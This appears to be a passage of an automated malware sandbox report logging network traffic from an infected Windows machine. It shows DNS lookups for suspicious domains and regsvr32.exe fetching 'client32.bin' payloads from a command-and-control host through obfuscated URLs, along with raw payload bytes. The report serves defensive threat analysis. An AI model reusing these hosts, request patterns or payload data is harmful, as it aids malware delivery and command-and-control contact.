                          Dec 14, 2021 10:34:08.944878101 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.947611094 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.947683096 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.947807074 CET4434980879.110.52.144192.168.2.5
                          Dec 14, 2021 10:34:08.948014975 CET49808443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.948250055 CET49808443192.168.2.579.110.52.144
                          Dec 14, 2021 10:34:08.948268890 CET4434980879.110.52.144192.168.2.5

                          UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 14, 2021 10:33:56.145939112 CET | 57128 | 53 | 192.168.2.5 | 8.8.8.8
Dec 14, 2021 10:33:56.164990902 CET | 53 | 57128 | 8.8.8.8 | 192.168.2.5
Dec 14, 2021 10:33:56.364356041 CET | 54791 | 53 | 192.168.2.5 | 8.8.8.8
Dec 14, 2021 10:33:56.382654905 CET | 53 | 54791 | 8.8.8.8 | 192.168.2.5
Dec 14, 2021 10:33:56.425647974 CET | 50463 | 53 | 192.168.2.5 | 8.8.8.8
Dec 14, 2021 10:33:56.444000959 CET | 53 | 50463 | 8.8.8.8 | 192.168.2.5
Dec 14, 2021 10:33:56.735696077 CET | 50394 | 53 | 192.168.2.5 | 8.8.8.8
Dec 14, 2021 10:33:56.753909111 CET | 53 | 50394 | 8.8.8.8 | 192.168.2.5
Dec 14, 2021 10:34:06.972225904 CET | 57344 | 53 | 192.168.2.5 | 8.8.8.8
Dec 14, 2021 10:34:06.988746881 CET | 53 | 57344 | 8.8.8.8 | 192.168.2.5
Dec 14, 2021 10:34:07.185264111 CET | 54450 | 53 | 192.168.2.5 | 8.8.8.8
Dec 14, 2021 10:34:07.205163956 CET | 53 | 54450 | 8.8.8.8 | 192.168.2.5
Dec 14, 2021 10:34:07.244362116 CET | 59261 | 53 | 192.168.2.5 | 8.8.8.8
Dec 14, 2021 10:34:07.262615919 CET | 53 | 59261 | 8.8.8.8 | 192.168.2.5
Dec 14, 2021 10:34:07.430716991 CET | 57151 | 53 | 192.168.2.5 | 8.8.8.8
Dec 14, 2021 10:34:07.448971033 CET | 53 | 57151 | 8.8.8.8 | 192.168.2.5
Dec 14, 2021 10:34:07.580158949 CET | 59413 | 53 | 192.168.2.5 | 8.8.8.8
Dec 14, 2021 10:34:07.596787930 CET | 53 | 59413 | 8.8.8.8 | 192.168.2.5
Dec 14, 2021 10:34:07.788218975 CET | 60516 | 53 | 192.168.2.5 | 8.8.8.8
Dec 14, 2021 10:34:07.792956114 CET | 51649 | 53 | 192.168.2.5 | 8.8.8.8
Dec 14, 2021 10:34:07.804882050 CET | 53 | 60516 | 8.8.8.8 | 192.168.2.5
Dec 14, 2021 10:34:07.810184002 CET | 65086 | 53 | 192.168.2.5 | 8.8.8.8
Dec 14, 2021 10:34:07.811239958 CET | 53 | 51649 | 8.8.8.8 | 192.168.2.5
Dec 14, 2021 10:34:07.826984882 CET | 53 | 65086 | 8.8.8.8 | 192.168.2.5
Dec 14, 2021 10:34:08.269373894 CET | 56432 | 53 | 192.168.2.5 | 8.8.8.8
Dec 14, 2021 10:34:08.285397053 CET | 53 | 56432 | 8.8.8.8 | 192.168.2.5
Dec 14, 2021 10:34:08.324105024 CET | 52929 | 53 | 192.168.2.5 | 8.8.8.8
Dec 14, 2021 10:34:08.340738058 CET | 53 | 52929 | 8.8.8.8 | 192.168.2.5
Dec 14, 2021 10:34:08.428600073 CET | 64317 | 53 | 192.168.2.5 | 8.8.8.8
Dec 14, 2021 10:34:08.445041895 CET | 53 | 64317 | 8.8.8.8 | 192.168.2.5
Dec 14, 2021 10:34:08.793006897 CET | 61004 | 53 | 192.168.2.5 | 8.8.8.8
Dec 14, 2021 10:34:08.812880993 CET | 53 | 61004 | 8.8.8.8 | 192.168.2.5

                          DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Dec 14, 2021 10:33:56.145939112 CET | 192.168.2.5 | 8.8.8.8 | 0xc7c | Standard query (0) | windows.update3.com | A (IP address) | IN (0x0001)
Dec 14, 2021 10:33:56.364356041 CET | 192.168.2.5 | 8.8.8.8 | 0xce4a | Standard query (0) | windows.update3.com | A (IP address) | IN (0x0001)
Dec 14, 2021 10:33:56.425647974 CET | 192.168.2.5 | 8.8.8.8 | 0xcd9e | Standard query (0) | windows.update3.com | A (IP address) | IN (0x0001)
Dec 14, 2021 10:33:56.735696077 CET | 192.168.2.5 | 8.8.8.8 | 0x8d48 | Standard query (0) | windows.update3.com | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:06.972225904 CET | 192.168.2.5 | 8.8.8.8 | 0x7b27 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:07.185264111 CET | 192.168.2.5 | 8.8.8.8 | 0x769b | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:07.244362116 CET | 192.168.2.5 | 8.8.8.8 | 0x2011 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:07.430716991 CET | 192.168.2.5 | 8.8.8.8 | 0xf508 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:07.580158949 CET | 192.168.2.5 | 8.8.8.8 | 0xfa | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:07.788218975 CET | 192.168.2.5 | 8.8.8.8 | 0x2a7c | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:07.792956114 CET | 192.168.2.5 | 8.8.8.8 | 0x714b | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:07.810184002 CET | 192.168.2.5 | 8.8.8.8 | 0x6f61 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:08.269373894 CET | 192.168.2.5 | 8.8.8.8 | 0x72a8 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:08.324105024 CET | 192.168.2.5 | 8.8.8.8 | 0x80a1 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:08.428600073 CET | 192.168.2.5 | 8.8.8.8 | 0xf677 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:08.793006897 CET | 192.168.2.5 | 8.8.8.8 | 0xb228 | Standard query (0) | berukoneru.website | A (IP address) | IN (0x0001)

                          DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Dec 14, 2021 10:33:56.164990902 CET | 8.8.8.8 | 192.168.2.5 | 0xc7c | No error (0) | windows.update3.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Dec 14, 2021 10:33:56.164990902 CET | 8.8.8.8 | 192.168.2.5 | 0xc7c | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 18.219.227.107 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:33:56.164990902 CET | 8.8.8.8 | 192.168.2.5 | 0xc7c | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.20.161.64 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:33:56.164990902 CET | 8.8.8.8 | 192.168.2.5 | 0xc7c | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.12.124.139 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:33:56.382654905 CET | 8.8.8.8 | 192.168.2.5 | 0xce4a | No error (0) | windows.update3.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Dec 14, 2021 10:33:56.382654905 CET | 8.8.8.8 | 192.168.2.5 | 0xce4a | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 18.219.227.107 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:33:56.382654905 CET | 8.8.8.8 | 192.168.2.5 | 0xce4a | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.12.124.139 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:33:56.382654905 CET | 8.8.8.8 | 192.168.2.5 | 0xce4a | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.20.161.64 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:33:56.444000959 CET | 8.8.8.8 | 192.168.2.5 | 0xcd9e | No error (0) | windows.update3.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Dec 14, 2021 10:33:56.444000959 CET | 8.8.8.8 | 192.168.2.5 | 0xcd9e | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.12.124.139 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:33:56.444000959 CET | 8.8.8.8 | 192.168.2.5 | 0xcd9e | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.20.161.64 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:33:56.444000959 CET | 8.8.8.8 | 192.168.2.5 | 0xcd9e | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 18.219.227.107 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:33:56.753909111 CET | 8.8.8.8 | 192.168.2.5 | 0x8d48 | No error (0) | windows.update3.com | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | CNAME (Canonical name) | IN (0x0001)
Dec 14, 2021 10:33:56.753909111 CET | 8.8.8.8 | 192.168.2.5 | 0x8d48 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 18.219.227.107 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:33:56.753909111 CET | 8.8.8.8 | 192.168.2.5 | 0x8d48 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.12.124.139 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:33:56.753909111 CET | 8.8.8.8 | 192.168.2.5 | 0x8d48 | No error (0) | prod-sav-park-lb01-1919960993.us-east-2.elb.amazonaws.com | | 3.20.161.64 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:06.988746881 CET | 8.8.8.8 | 192.168.2.5 | 0x7b27 | No error (0) | berukoneru.website | | 79.110.52.144 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:07.205163956 CET | 8.8.8.8 | 192.168.2.5 | 0x769b | No error (0) | berukoneru.website | | 79.110.52.144 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:07.262615919 CET | 8.8.8.8 | 192.168.2.5 | 0x2011 | No error (0) | berukoneru.website | | 79.110.52.144 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:07.448971033 CET | 8.8.8.8 | 192.168.2.5 | 0xf508 | No error (0) | berukoneru.website | | 79.110.52.144 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:07.596787930 CET | 8.8.8.8 | 192.168.2.5 | 0xfa | No error (0) | berukoneru.website | | 79.110.52.144 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:07.804882050 CET | 8.8.8.8 | 192.168.2.5 | 0x2a7c | No error (0) | berukoneru.website | | 79.110.52.144 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:07.811239958 CET | 8.8.8.8 | 192.168.2.5 | 0x714b | No error (0) | berukoneru.website | | 79.110.52.144 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:07.826984882 CET | 8.8.8.8 | 192.168.2.5 | 0x6f61 | No error (0) | berukoneru.website | | 79.110.52.144 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:08.285397053 CET | 8.8.8.8 | 192.168.2.5 | 0x72a8 | No error (0) | berukoneru.website | | 79.110.52.144 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:08.340738058 CET | 8.8.8.8 | 192.168.2.5 | 0x80a1 | No error (0) | berukoneru.website | | 79.110.52.144 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:08.445041895 CET | 8.8.8.8 | 192.168.2.5 | 0xf677 | No error (0) | berukoneru.website | | 79.110.52.144 | A (IP address) | IN (0x0001)
Dec 14, 2021 10:34:08.812880993 CET | 8.8.8.8 | 192.168.2.5 | 0xb228 | No error (0) | berukoneru.website | | 79.110.52.144 | A (IP address) | IN (0x0001)

                          HTTP Request Dependency Graph

                          • berukoneru.website

                          HTTPS Proxied Packets

                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          0 | 192.168.2.5 | 49795 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\regsvr32.exe
                          Timestamp | kBytes transferred | Direction | Data
                          2021-12-14 09:34:07 UTC | 0 | OUT | GET /tire/5Dw6h1nh0yZR8l/CEdpvqzTXmbvA8zN38_2F/HfVXZtPlGclvWlY_/2F2pmmVAx7s9onw/Df8mv9bGmzrCq_2BDh/Avhzr_2BW/zhUOFRSj_2Brp9dFi25e/XIimtsTVgbS8Ddk4Jlg/q7ifDAWTLXmxh8fPSAYnUc/3K8xDlQvgKVYD/9E1TEXJC/aPKjFJSRgVkfUwKBYWKDgLh/VONwiC9wK5/3CPG7RAhZST/_2FDfWf.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:07 UTC | 0 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:07 GMT
                          Content-Type: application/zip
                          Content-Length: 213639
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=qetl3urna05fer0cu0uej8os80; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          1 | 192.168.2.5 | 49796 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\regsvr32.exe
                          Timestamp | kBytes transferred | Direction | Data
                          2021-12-14 09:34:07 UTC | 209 | OUT | GET /tire/BkVC2TYPKwX7I/d18vbD7j/LfTctW1YFOCxVg72R7OOyCe/FNM87YiO3R/kqhypryuHYA4xvaox/Zos6wfhvU6Vx/dZ_2FhTkVUm/dQ1eWiBdVQx_2F/3MQ4AfN6CRhAz7ojdkAuB/vyHN6D_2BnDaccRD/rxLm6HRGflkJaqH/HtsgyaJ8NMuefJHJTr/vf407nMOm/3YNEpWUoxMPlA61ciEA5/ZB4w8oLbC0y/cC.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:07 UTC | 210 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:07 GMT
                          Content-Type: application/zip
                          Content-Length: 213639
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=703qcv2nu1i02fgfe68euftlm4; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin


                          Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                          10 | 192.168.2.5 | 49807 | 79.110.52.144 | 443 | C:\Windows\SysWOW64\regsvr32.exe
                          Timestamp | kBytes transferred | Direction | Data
                          2021-12-14 09:34:08 UTC | 1895 | OUT | GET /tire/o4Wh2yGKlAclIXiSKni/E2GRbJwAfyjZDLvIiDUTZP/MYjyQpBnAiuxp/RCS8IZuc/T6rd9RjJyTuIO59AdkBUbyh/AeLhgjzVcK/R628sGYn00PGPEGL1/qe_2FhyY_2B4/KAdwjy0pLGn/wY1nXPl9lZfHBx/mKriUsf47w97_2F05n24c/_2B3uV0T1ULXF_2F/rws1Po8g_2B5W/rqgHz.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:08 UTC | 1896 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:08 GMT
                          Content-Type: application/zip
                          Content-Length: 1869
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=9pokd33d23ohcifgffqmh7mjg6; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:08 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin


                          Session ID: 11 | Source IP: 192.168.2.5 | Source Port: 49808 | Destination IP: 79.110.52.144 | Destination Port: 443 | Process: C:\Windows\SysWOW64\regsvr32.exe
                          Timestamp | kBytes transferred | Direction | Data
                          2021-12-14 09:34:08 UTC | 1898 | OUT | GET /tire/gAFUHu83b7fr5ftbr5O9tX/NNJYheBEZ_2Bt/wXhf6hyZ/iBEWHVb19RFKuDukD6ImzPG/nqeMvnB_2B/0lgxK72Q_2BWOlTx_/2BHVUq8DywzL/dSOEptmJdkD/639IuGSCq9GXlR/PUHxRfZnx0Of7xPsoVOC_/2FTMAnj0YKLpX9By/omZGYbxoocAN6vP/PuGPVsc2wwxbBsmHOU/YqsK1vpPn/dCIkRouQqQLmE/5L.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:08 UTC | 1898 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:08 GMT
                          Content-Type: application/zip
                          Content-Length: 1869
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=0egjoe75dvn618qck4vl9caql1; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:08 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin


                          Session ID: 2 | Source IP: 192.168.2.5 | Source Port: 49797 | Destination IP: 79.110.52.144 | Destination Port: 443 | Process: C:\Windows\SysWOW64\regsvr32.exe
                          Timestamp | kBytes transferred | Direction | Data
                          2021-12-14 09:34:07 UTC | 209 | OUT | GET /tire/fGFKjH5BjbdZz4tmUO5m/ZAUfPXxElw8Dkm9Cfh9/xqmrK6ieQrOr54I1y1Md2B/CJZjvCZRXK_2B/c6YLK40A/ibGCXB5z8qRJaf9iUFEBazW/9sEXIVndb3/DsRsV2z8TCrjx7mBI/rTZxp021lQBU/ESMggS1gJ_2/Bi3Bcj9_2B8Xf4/Xr9j2PgVhY9_2FzIeDatB/WE3DM_2B4ZBLmr9g/bExshi993/JbJC0wJJ/U.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:07 UTC | 290 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:07 GMT
                          Content-Type: application/zip
                          Content-Length: 213639
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=6e2b9843h042p8pk0q33ujpg11; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin


                          Session ID: 3 | Source IP: 192.168.2.5 | Source Port: 49798 | Destination IP: 79.110.52.144 | Destination Port: 443 | Process: C:\Windows\SysWOW64\regsvr32.exe
                          Timestamp | kBytes transferred | Direction | Data
                          2021-12-14 09:34:07 UTC | 628 | OUT | GET /tire/cFJsSWAGWE/z2qui_2Bz1BNPPVC8/40cjfJwuY_2F/qeMRrcIZBVG/Ne0YpnkwEJfIh3/f5okxbrq_2FXxzqJmpSlY/lBFuBWEAi70a61Vy/5QzGUBrPY97n5jQ/Uty84umyFnIA829ewc/61TtijfTY/zF0ZOoxI3N5pWHzggULR/QMXY_2F7FMDggc4thO7/G_2BQV4WNp08p5XmI0/TT.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                          2021-12-14 09:34:07 UTC | 629 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:07 GMT
                          Content-Type: application/zip
                          Content-Length: 213639
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=6ibnq2u0g0h401bek74k8hvu83; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin


                           Session ID: 4
                           Source IP: 192.168.2.5   Source Port: 49799
                           Destination IP: 79.110.52.144   Destination Port: 443
                           Process: C:\Windows\SysWOW64\regsvr32.exe
                           Timestamp | kBytes transferred | Direction | Data
                           2021-12-14 09:34:07 UTC | 838 | OUT | GET /tire/iL5Q0EgKDzXlIJvSVY9Fa72/roFEnyYEEO/BTl6hhjqhLPztNm87/ClBTSTJ24YQi/659nN8frXqL/KI_2BmGQcF3l8a/UPJEdWRElF2Ck7h3GrI7f/Jn4UaIHKOCKly3pR/5WtUgfhtCob3WA8/8RFl0SkPd8NK0tapfV/Bv03ARxcw/T6wxTs3S_2BFMRgrZw2Q/_2BV_2F7vXjmj/i.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                           2021-12-14 09:34:07 UTC | 838 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:07 GMT
                          Content-Type: application/zip
                          Content-Length: 268426
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=tfmpovqco4irtlnkvm30nfl1s5; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin


                           Session ID: 5
                           Source IP: 192.168.2.5   Source Port: 49802
                           Destination IP: 79.110.52.144   Destination Port: 443
                           Process: C:\Windows\SysWOW64\regsvr32.exe
                           Timestamp | kBytes transferred | Direction | Data
                           2021-12-14 09:34:07 UTC | 1101 | OUT | GET /tire/9IgUYNG9/P9N8jGg62VAhbwmUeolHFCg/K1HN9iUPdi/an2HdiNP_2FRIROSF/l9uR7XFSquKc/cTL90RaThvy/4LigE_2BC67Pa2/OL_2Fq6LzSFfAjBrcF1my/5AUpi_2BYfx15AAS/Ho8688ZDo7zPK6r/e_2F4ZPz87sJSle6kT/I1gJ4hikp/cCibgdVeBM9n2ccXEO18/D4MJBqmD.eta HTTP/1.1
                          Cache-Control: no-cache
                          Connection: Keep-Alive
                          Pragma: no-cache
                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                          Host: berukoneru.website
                           2021-12-14 09:34:08 UTC | 1102 | IN | HTTP/1.1 200 OK
                          Server: nginx/1.20.1
                          Date: Tue, 14 Dec 2021 09:34:07 GMT
                          Content-Type: application/zip
                          Content-Length: 268426
                          Connection: close
                          X-Powered-By: PHP/5.4.16
                          Set-Cookie: PHPSESSID=hknqubagd3jvbvckr7p3s9hgo7; path=/; domain=.berukoneru.website
                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                          Cache-Control: public
                          Pragma: no-cache
                          Set-Cookie: lang=en; expires=Thu, 13-Jan-2022 09:34:07 GMT; path=/
                          Content-Transfer-Encoding: Binary
                          Content-Disposition: attachment; filename=client32.bin
                          2021-12-14 09:34:08 UTC1614INData Raw: c2 61 cf 8c 2f b2 24 45 8c 67 0a e0 9e 0e d3 56 02 f9 ae c6 0b 8c b0 20 6a 9d bf fe f5 1e 76 8f 67 44 ce cb 4d a2 f3 dc 19 39 a2 ab 10 99 a2 d3 ee a6 fc cb 20 dd 11 8f e5 35 c2 2f af 2f 4c 71 bf dc 14 a7 a7 25 6e 72 73 66 fc a8 c2 13 63 cc 5f 88 7e 1d 7e 17 a4 4a 3a 4c 21 39 d1 3c 9f 49 ec e7 5a c6 02 30 fd 73 16 56 e6 4b 80 e3 3c 27 15 d1 23 c8 c3 d5 29 d0 84 95 91 11 76 5c 2c 31 75 7c a8 95 fc c1 2e 9b 9c 7a 0c 44 ea 83 dd c1 33 67 e4 0b a3 7c 84 b4 76 dc 53 d7 5b fc 1c ea 9f b4 8f a0 8f fd e8 8e 42 6d 63 4c e9 06 af 2e b8 17 ef f8 84 af a5 28 63 89 93 7b 49 a3 69 49 d6 85 59 ef e5 c0 af 5c da 1e 71 fe a9 4d b7 a8 8a 8c 33 f6 60 76 57 c9 37 29 0e 9c 32 bc 23 8c 03 9e 69 1c 29 5a 9a 5a 05 2d 8c be a5 d7 8a b0 a4 dc 83 27 05 9d 94 30 a3 16 e0 56 34 b8 41
                          Data Ascii: a/$EgV jvgDM9 5//Lq%nrsfc_~~J:L!9<IZ0sVK<'#)v\,1u|.zD3g|vS[BmcL.(c{IiIY\qM3`vW7)2#i)ZZ-'0V4A
                          2021-12-14 09:34:08 UTC1630INData Raw: 58 d8 82 37 37 ab b8 52 c0 ec 8a 18 10 63 05 5d 1d d8 dd 36 47 4c 16 7d be 55 2c 10 d9 d7 04 d0 6c ed 03 56 8c 14 1b 07 e9 94 da 52 77 c2 86 6e b5 00 89 c1 06 dc f8 69 51 53 db 22 07 31 cc 1c ee be 3a 7b 91 14 87 58 ea 30 22 73 7d 62 0e b9 a3 c5 27 36 d8 b3 72 c1 9f a7 0f db 01 4a 9e 8b d4 44 77 58 f6 71 0c 81 c8 4e 8b f7 39 34 39 c9 43 8a 8a 0b 91 e3 94 4b 72 07 23 e3 78 94 1e 0a 14 07 9e 75 1d e1 c9 d1 8c 55 6e ab 99 25 d4 bc e6 d5 df 36 04 e0 35 72 29 a6 5f d9 16 9d a3 4f a3 6d 29 46 14 76 cb 7e 09 03 2a 63 0e 4d 08 71 1e 60 13 78 d5 13 c9 72 b2 7b 4e 58 72 a5 c9 3d 3f e7 27 20 3f 72 e5 b6 2f a2 df 47 79 4a fd 4f 62 27 41 80 d8 4d bd 23 e3 5b 0d 6f 9d 60 e0 2f 6a f8 08 fe 5f be 65 4c 01 10 17 3f a4 3b 13 54 73 4f be 11 4d 2e 67 b0 7c 64 16 b1 0d eb 8a
                          Data Ascii: X77Rc]6GL}U,lVRwniQS"1:{X0"s}b'6rJDwXqN949CKr#xuUn%65r)_Om)Fv~*cMq`xr{NXr=?' ?r/GyJOb'AM#[o`/j_eL?;TsOM.g|d
